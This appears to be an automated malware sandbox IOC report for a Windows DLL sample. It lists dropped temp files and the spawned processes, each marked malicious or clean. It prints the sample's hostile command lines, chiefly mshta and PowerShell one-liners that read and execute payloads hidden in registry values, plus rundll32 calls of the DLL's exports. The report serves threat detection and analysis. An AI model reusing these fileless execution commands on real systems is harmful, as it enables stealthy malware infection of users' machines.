IOC Report

loading gif

Files

File Path
Type
Category
Malicious
2u2mgtylJy.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
initial sample
malicious
C:\Users\user\AppData\Local\Temp\jdlmh2q4.cmdline
UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
clean
C:\Users\user\AppData\Local\Temp\4z2qptpk.0.cs
UTF-8 Unicode (with BOM) text
dropped
clean
C:\Users\user\AppData\Local\Temp\4z2qptpk.cmdline
UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
dropped
clean
C:\Users\user\AppData\Local\Temp\4z2qptpk.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
clean
C:\Users\user\AppData\Local\Temp\4z2qptpk.out
ASCII text, with CRLF, CR line terminators
modified
clean
C:\Users\user\AppData\Local\Temp\CSC5471F709FE714810AB0D5625CD34D24.TMP
MSVC .res
dropped
clean
C:\Users\user\AppData\Local\Temp\CSC919BED62534A4CC3BF2669B466E033B8.TMP
MSVC .res
dropped
clean
C:\Users\user\AppData\Local\Temp\CSCCE0193F21C5D49109645DA91D5FFF210.TMP
MSVC .res
dropped
clean
C:\Users\user\AppData\Local\Temp\CSCCED00F42533349BEA98D8A77AE340CD.TMP
MSVC .res
dropped
clean
C:\Users\user\AppData\Local\Temp\RES1839.tmp
data
dropped
clean
C:\Users\user\AppData\Local\Temp\RES889.tmp
data
dropped
clean
C:\Users\user\AppData\Local\Temp\RESD66D.tmp
data
dropped
clean
C:\Users\user\AppData\Local\Temp\RESE022.tmp
data
dropped
clean
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_02dbrdif.tbr.ps1
very short file (no magic)
dropped
clean
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ebhtree3.nqf.psm1
very short file (no magic)
dropped
clean
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mz1hzvcs.52m.ps1
very short file (no magic)
dropped
clean
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ow5jbajq.osu.psm1
very short file (no magic)
dropped
clean
C:\Users\user\AppData\Local\Temp\jdlmh2q4.0.cs
UTF-8 Unicode (with BOM) text
dropped
clean
C:\Users\user\AppData\Local\Temp\jdlmh2q4.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
clean
C:\Users\user\AppData\Local\Temp\jdlmh2q4.out
ASCII text, with CRLF, CR line terminators
modified
clean
C:\Users\user\AppData\Local\Temp\w34iw342.0.cs
UTF-8 Unicode (with BOM) text
dropped
clean
C:\Users\user\AppData\Local\Temp\w34iw342.cmdline
UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
dropped
clean
C:\Users\user\AppData\Local\Temp\w34iw342.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
clean
C:\Users\user\AppData\Local\Temp\w34iw342.out
ASCII text, with CRLF, CR line terminators
modified
clean
C:\Users\user\AppData\Local\Temp\yg5i0oy3.0.cs
UTF-8 Unicode (with BOM) text
dropped
clean
C:\Users\user\AppData\Local\Temp\yg5i0oy3.cmdline
UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
dropped
clean
C:\Users\user\AppData\Local\Temp\yg5i0oy3.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
clean
C:\Users\user\AppData\Local\Temp\yg5i0oy3.out
ASCII text, with CRLF, CR line terminators
modified
clean
C:\Users\user\Documents\20211006\PowerShell_transcript.965969.PeztN8su.20211006233727.txt
UTF-8 Unicode (with BOM) text, with CRLF line terminators
dropped
clean
C:\Users\user\Documents\20211006\PowerShell_transcript.965969.n1aVGIxX.20211006233737.txt
UTF-8 Unicode (with BOM) text, with CRLF line terminators
dropped
clean
There are 22 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\loaddll32.exe
loaddll32.exe 'C:\Users\user\Desktop\2u2mgtylJy.dll'
malicious
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\2u2mgtylJy.dll',#1
malicious
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\user\Desktop\2u2mgtylJy.dll,Bonebegin
malicious
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe 'C:\Users\user\Desktop\2u2mgtylJy.dll',#1
malicious
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\user\Desktop\2u2mgtylJy.dll,Father
malicious
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\user\Desktop\2u2mgtylJy.dll,Ratherdesign
malicious
C:\Windows\System32\mshta.exe
'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>K0qx='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(K0qx).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jdlmh2q4.cmdline'
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\w34iw342.cmdline'
malicious
C:\Windows\System32\mshta.exe
'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Cbv5='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cbv5).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
malicious
C:\Windows\explorer.exe
C:\Windows\Explorer.EXE
malicious